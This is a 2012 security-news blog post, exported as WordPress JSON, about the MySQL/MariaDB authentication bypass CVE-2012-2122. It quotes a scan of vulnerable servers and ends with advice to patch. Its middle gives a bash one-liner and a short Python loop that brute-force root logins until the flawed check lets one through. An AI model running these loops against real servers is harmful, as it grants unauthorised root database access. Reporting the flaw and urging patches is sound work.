{"id":3339,"date":"2012-06-12T10:23:54","date_gmt":"2012-06-12T09:23:54","guid":{"rendered":"https:\/\/www.darknet.org.uk\/?p=3339"},"modified":"2015-09-09T19:36:58","modified_gmt":"2015-09-09T11:36:58","slug":"mysql-1-liner-hack-gives-root-access-without-password","status":"publish","type":"post","link":"https:\/\/www.darknet.org.uk\/2012\/06\/mysql-1-liner-hack-gives-root-access-without-password\/","title":{"rendered":"MySQL 1 Liner Hack Gives Root Access Without Password"},"content":{"rendered":"

The latest news that has hit the streets is the occurrence of the easiest hack ever, if you have local shell access (any user privilege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.<\/p>\n

I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:<\/p>\n

[sh]while [ 1 ]; do mysql -u root --password=123; done[\/sh]<\/p>\n

Or the Python version I originally saw:<\/p>\n

\r\n#!\/usr\/bin\/python\r\nimport subprocess\r\n\r\nwhile 1:\r\n        subprocess.Popen(\"mysql -u root mysql --password=blah\", shell=True).wait()<\/pre>\n

Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.<\/p>\n

According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name \u2018root\u2019.<\/p>\n

The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.<\/p>\n

Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the \u201ctragically comedic\u201d flaw.<\/p><\/blockquote>\n

There are a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.<\/p>\n

And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do –<\/p>\n

aptitude update; aptitude safe-upgrade<\/pre>\n

If you are using a shitty OS that uses yum or something – figure it out yourself.<\/p>\n